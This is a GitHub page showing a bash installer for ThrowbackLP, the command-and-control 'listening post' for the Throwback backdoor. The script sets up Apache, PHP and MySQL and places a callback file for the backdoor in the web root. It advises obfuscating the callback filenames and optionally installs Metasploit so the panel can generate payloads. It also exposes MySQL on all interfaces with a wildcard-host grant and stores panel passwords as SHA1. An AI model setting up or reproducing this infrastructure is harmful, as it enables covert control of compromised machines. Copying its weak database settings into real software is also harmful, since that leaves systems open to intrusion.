-
Notifications
You must be signed in to change notification settings - Fork 54
/
ThrowbackInstaller.sh
308 lines (242 loc) · 12.5 KB
/
ThrowbackInstaller.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
#!/bin/bash
TBDIR=./ThrowbackLP
SQLSCRIPT=throwbackcp.sql
DBNAME=throwbackcp
GITURL=https://github.com/silentbreaksec/ThrowbackLP.git
DBUSER=tblp
red=$'\e[1;31m'
green=$'\e[1;32m'
end=$'\e[0m'
if [ "$EUID" -ne 0 ]; then
echo "${red}[+] Needs to be run as root. Exiting...${end}"
exit
fi
echo "${green}[+] Installing a few dependencies (Apache2, PHP 5, Git, etc.) for ThrowbackLP."
echo "[+] This could take a while...${end}"
apt-get update > /dev/null
apt-get -y install zip ntp git apt-utils dialog apache2 php5 php5-mysql &> /dev/null
while true; do
read -p "${red}[+] Would you like to enable SSL? (y/n)${end} " yn
if [ "${yn}" == 'y' ] || [ "${yn}" == 'Y' ]; then
setupssl=true
break
elif [ "${yn}" == "n" ] || [ "${yn}" == "N" ]; then
setupssl=false
break
fi
done
if [ "$setupssl" = true ] ; then
a2enmod ssl > /dev/null
a2ensite default-ssl > /dev/null
mkdir -p /etc/apache2/ssl
read -p "${red}[+] Would you like to use a self-signed cert? (y/n)${end} " yn
if [ "${yn}" == 'y' ] || [ "${yn}" == 'Y' ]; then
hn=`hostname`
echo "${green}[+] Generating self-signed certificates.${end}"
openssl req -x509 -nodes -days 365 -subj "/C=US/ST=MD/L=FtMeade/O=NSA/CN=www.'${hn}'.com" -newkey rsa:2048 -keyout /etc/apache2/ssl/ssl.key -out /etc/apache2/ssl/ssl.crt 2> /dev/null
sed -i 's/SSLCertificateFile/#SSLCertificateFile/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/SSLCertificateKeyFile/#SSLCertificateKeyFile/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/SSLEngine on/SSLEngine on\n\t\tSSLCertificateKeyFile \/etc\/apache2\/ssl\/ssl.key/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/SSLEngine on/SSLEngine on\n\t\tSSLCertificateFile \/etc\/apache2\/ssl\/ssl.crt/g' /etc/apache2/sites-available/default-ssl.conf
elif [ "${yn}" == "n" ] || [ "${yn}" == "N" ]; then
echo "${red}[+] Be sure to copy your certs to the locations listed below."
echo "\etc\apache2\ssl\sslchain.pem"
echo "\etc\apache2\ssl\ssl.key"
echo "\etc\apache2\ssl\ssl.crt${end}"
sed -i 's/SSLCertificateFile/#SSLCertificateFile/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/SSLCertificateKeyFile/#SSLCertificateKeyFile/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/tSSLCertificateChainFile/#SSLCertificateChainFile/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/SSLEngine on/SSLEngine on\n\t\tSSLCertificateChainFile \/etc\/apache2\/ssl\/sslchain.pem/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/SSLEngine on/SSLEngine on\n\t\tSSLCertificateKeyFile \/etc\/apache2\/ssl\/ssl.key/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/SSLEngine on/SSLEngine on\n\t\tSSLCertificateFile \/etc\/apache2\/ssl\/ssl.crt/g' /etc/apache2/sites-available/default-ssl.conf
fi
echo "${green}[+] Restarting the Apache server.${end}"
service apache2 restart &> /dev/null
fi
echo "${green}[+] Hardening the Apache web server.${end}"
sed -i 's/Options Indexes/Options/g' /etc/apache2/sites-available/000-default.conf
sed -i 's/Options Indexes/Options/g' /etc/apache2/sites-available/default-ssl.conf
sed -i 's/Options Indexes/Options/g' /etc/apache2/apache2.conf
sed -i 's/ServerTokens OS/ServerTokens Prod/g' /etc/apache2/conf-available/security.conf
sed -i 's/ServerSignature On/ServerSignature Off/g' /etc/apache2/conf-available/security.conf
update-rc.d apache2 defaults &> /dev/null
update-rc.d apache2 enable &> /dev/null
echo "${green}[+] Checking out ThrowbackLP from GitHub.${end}"
cd /tmp/
git clone $GITURL > /dev/null
while true; do
read -p "${red}[+] Enter the root WWW directory, or leave blank for the default. (i.e. /var/www/html)${end} " wwwrootdir
if [ "${wwwrootdir}" == "" ]; then
wwwrootdir=/var/www/html
fi
if [ -d "$wwwrootdir" ]; then
break
fi
done
echo "${green}[+] The Throwback backdoor calls back to a PHP file hosted on one or more ThrowbackLP servers. These PHP files are used for callback data (from the backdoor) and can have different filenames on the different ThrowbackLP servers. Make note of the filenames, use the mangle Python script to obfuscate them, and then compile them into the Throwback backdoor.${end}"
read -p "${red}[+] What would you like to name the PHP file for the Throwback callback? (e.g. index.php)${end} " callbackfile
if [ "${callbackfile}" == "" ]; then
callbackfile=index.php
fi
echo "${green}[+] Fyi, this file is placed in ${wwwrootdir}.${end}"
while true; do
read -p "${red}[+] Is this server the primary ThrowbackLP? (y/n)${end} " yn
if [ "${yn}" == 'y' ] || [ "${yn}" == 'Y' ]; then
primarylp=true
mkdir $wwwrootdir/cp
mkdir $wwwrootdir/down
while true; do
read -p "${red}[+] Enter the MySQL root password. If you haven't installed MySQL, enter the password you'd like to use:${end} " mysqlpw1
read -p "${red}[+] Please confirm:${end} " mysqlpw2
if [ "${mysqlpw1}" == "${mysqlpw2}" ]; then
break
fi
done
break
elif [ "${yn}" == "n" ] || [ "${yn}" == "N" ]; then
primarylp=false
while true; do
read -p "${red}[+] Enter the IP address of the primary ThrowbackLP:${end} " tblp1
read -p "${red}[+] Please confirm:${end} " tblp2
if [ "${tblp1}" == "${tblp2}" ]; then
break
fi
done
while true; do
read -p "${red}[+] Enter the password for the 'tblp' datbase user on the primary MySQL server:${end} " tblppw1
read -p "${red}[+] Please confirm:${end} " tblppw2
if [ "${tblppw1}" == "${tblppw2}" ]; then
break
fi
done
break
fi
done
if [ "$primarylp" = true ] ; then
echo "${green}[+] Installing MySQL server.${end}"
apt-get --reinstall install bsdutils &> /dev/null
debconf-set-selections <<< 'mysql-server mysql-server/root_password password '$mysqlpw1
debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password '$mysqlpw1
apt-get -y install mysql-server &> /dev/null
echo "${green}[+] Installing SQL database and tables.${end}"
mysql -u root -p$mysqlpw1 -e "create database "$DBNAME";"
mysql -u root -p$mysqlpw1 $DBNAME < $TBDIR/$SQLSCRIPT
echo '${green}[+] Generating random password for the ThrowbackLP database user.'
echo "[+] Note that you'll need these credentials if connecting other ThrowbackLPs to this primary LP.${end}"
tblppw=`head /dev/urandom | tr -dc A-Za-z0-9 | head -c 15`
echo "${green}[+] For reference, the credentials are below."
echo "Username: ${end}${red}tblp${end}"
echo "${green}Password: ${end}${red}${tblppw}${end}"
sed -i 's/public static \$host.*/public static \$host = "127.0.0.1";/g' $TBDIR/cp/includes/mysql.php
sed -i 's/public static \$password.*/public static \$password = "'$tblppw'";/g' $TBDIR/cp/includes/mysql.php
sed -i 's/public static \$user.*/public static \$user = "'$DBUSER'";/g' $TBDIR/cp/includes/mysql.php
sed -i 's/public static \$dbName.*/public static \$dbName = "'$DBNAME'";/g' $TBDIR/cp/includes/mysql.php
sed -i 's/public static \$host.*/public static \$host = "127.0.0.1";/g' $TBDIR/index.php
sed -i 's/public static \$password.*/public static \$password = "'$tblppw'";/g' $TBDIR/index.php
sed -i 's/public static \$user.*/public static \$user = "'$DBUSER'";/g' $TBDIR/index.php
sed -i 's/public static \$dbName.*/public static \$dbName = "'$DBNAME'";/g' $TBDIR/index.php
mysql -uroot -p$mysqlpw1 $DBNAME -e "GRANT ALL ON throwbackcp.* to tblp@localhost IDENTIFIED BY '${tblppw}'";
mysql -uroot -p$mysqlpw1 $DBNAME -e "GRANT ALL ON throwbackcp.* to tblp@'%' IDENTIFIED BY '${tblppw}'";
mysql -uroot -p$mysqlpw1 $DBNAME -e "FLUSH PRIVILEGES;"
while true; do
read -p "${red}[+] Would you like to create a user for the Throwback Control Panel? (y/n)${end} " yn
if [ "${yn}" == 'y' ] || [ "${yn}" == 'Y' ]; then
while true; do
read -p "${red}[+] Enter the new username:${end} " user
read -p "${red}[+] You entered ${user}. Is that correct? (y/n)${end} " yn1
if [ "${yn1}" == 'y' ] || [ "${yn1}" == 'Y' ]; then
break
fi
done
while true; do
read -p "${red}[+] Enter ${user}'s password:${end} " pass
read -p "${red}[+] You entered ${pass}. Is that correct? (y/n)${end} " yn2
if [ "${yn2}" == 'y' ] || [ "${yn2}" == 'Y' ]; then
break
fi
done
mysql -uroot -p$mysqlpw1 $DBNAME -e "INSERT INTO \`users\` (\`id\`, \`username\`, \`password\`, \`lastlogin\`) VALUES (0, '${user}', SHA1('${pass}'), '0');"
elif [ "${yn}" == "n" ] || [ "${yn}" == "N" ]; then
break
fi
done
echo "${green}[+] Copying ThrowbackLP files to ${wwwrootdir}.${end}"
echo "${green}[+] Fyi, these files are copied to ${wwwrootdir}/cp/.${end}"
mv $TBDIR/index.php $wwwrootdir/$callbackfile
cp -r $TBDIR/cp/* $wwwrootdir/cp/
sed -i 's/bind-address.*/bind-address = 0.0.0.0/g' /etc/mysql/my.cnf
service mysql restart &> /dev/null
update-rc.d mysql defaults &> /dev/null
update-rc.d mysql enable &> /dev/null
else
sed -i 's/public static \$password.*/public static \$password = "'$tblppw1'";/g' $TBDIR/index.php
sed -i 's/public static \$host.*/public static \$host = "'$tblp1'";/g' $TBDIR/index.php
sed -i 's/public static \$user.*/public static \$user = "'$DBUSER'";/g' $TBDIR/index.php
sed -i 's/public static \$dbName.*/public static \$dbName = "'$DBNAME'";/g' $TBDIR/index.php
echo "${green}[+] Copying ThrowbackLP files to ${wwwrootdir}.${end}"
mv $TBDIR/index.php $wwwrootdir/$callbackfile
echo "${green}[+] Success! We're done here.${end}"
fi
chmod -R 755 $wwwrootdir > /dev/null
rm -rf $TBDIR
msfpw=`head /dev/urandom | tr -dc A-Za-z0-9 | head -c 10`
echo load msgrpc Pass=${msfpw} > /root/msgrpc.rc
if [ "$primarylp" = true ] ; then
if [ "$setupssl" = true ] ; then
echo "${green}[+] Success! Login to ThrowbackLP at https://[IP_OF_HOST]/cp/index.php ${end}"
else
echo "${green}[+] Success! Login to ThrowbackLP at http://[IP_OF_HOST]/cp/index.php ${end}"
fi
fi
while true; do
read -p "${red}[+] ThrowbackLP can also interface with Metasploit to create various payloads to perform interactive operations. Would you like to install Metasploit? This is experimental! (y/n)${end} " yn
if [ "${yn}" == 'y' ] || [ "${yn}" == 'Y' ]; then
installmsf=true
break
elif [ "${yn}" == "n" ] || [ "${yn}" == "N" ]; then
installmsf=false
break
fi
done
if [ "$installmsf" == true ]; then
echo "${red}[+] Ok, but don't say we didn't warn you!${end}"
echo "${green}[+] Installing kernel headers.${end}"
apt-get -y install gcc make linux-headers-$(uname -r) > /dev/null
ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linux-headers-$(uname -r)/include/linux/
echo "${green}[+] Installing additional dependencies.${end}"
apt-get -y install php5-dev php-pear build-essential > /dev/null
echo "${green}[+] Installing and configuring MsgPack for PHP. ${end}${red}Watch for any errors!${end}"
#pecl install channel://pecl.php.net/msgpack-0.5.5
wget --quiet https://pecl.php.net/get/msgpack-0.5.7.tgz > /dev/null
tar -zxvf msgpack-0.5.7.tgz > /dev/null
cd msgpack-0.5.7 > /dev/null
phpize > /dev/null
./configure > /dev/null
make && make install > /dev/null
cd .. > /dev/null
rm -rf msgpack-0.5.7 > /dev/null
echo "extension=msgpack.so" >> /etc/php5/apache2/php.ini
echo "${green}[+] Installing the last few dependencies.${end}"
apt-get -y install curl libcurl3 libcurl3-dev php5-curl &> /dev/null
machinetype=`uname -m`
cd /tmp/
if [ ${machinetype} == 'x86_64' ]; then
echo "${green}[+] Downloading the x64 version of Metasploit. This may take a while.${end}"
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run > /dev/null
else
echo "${green}[+] Downloading the x86 version of Metasploit. This may take a while.${end}"
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run > /dev/null
fi
echo "${green}[+] Download complete! Starting the Metasploit installer.${end}"
chmod +x /tmp/metasploit-latest-linux*.run
/tmp/metasploit-latest-linux*.run
echo "${red}[+] Don't forget to register Metasploit! Go to https://localhost:3790 to create a user account and obtain/activate a license key.${end}"
echo "${green}[+] Configuring ThrowbackLP for Metasploit.${end}"
sed -i 's/\$MSFPASSWORD.*/\$MSFPASSWORD = "'$msfpw'";/g' $wwwrootdir/cp/includes/conf.php
sed -i 's/\$METASPLOIT.*/\$METASPLOIT = "127.0.0.1";/g' $wwwrootdir/cp/includes/conf.php
sed -i 's/\$MSFUSERNAME.*/\$MSFUSERNAME = "msf";/g' $wwwrootdir/cp/includes/conf.php
echo "${green}[+] Start Metasploit via 'msfconsole -r /root/msgrpc.rc', and you **should** be able to generate payload in the ThrowbackLP interface.${end}"
echo "${green}[+] It's also a good idea to create the Metasploit console in a screen session.${end}"
service apache2 restart &> /dev/null
fi
echo "${green}[+] All done. Thanks for playing!${end}"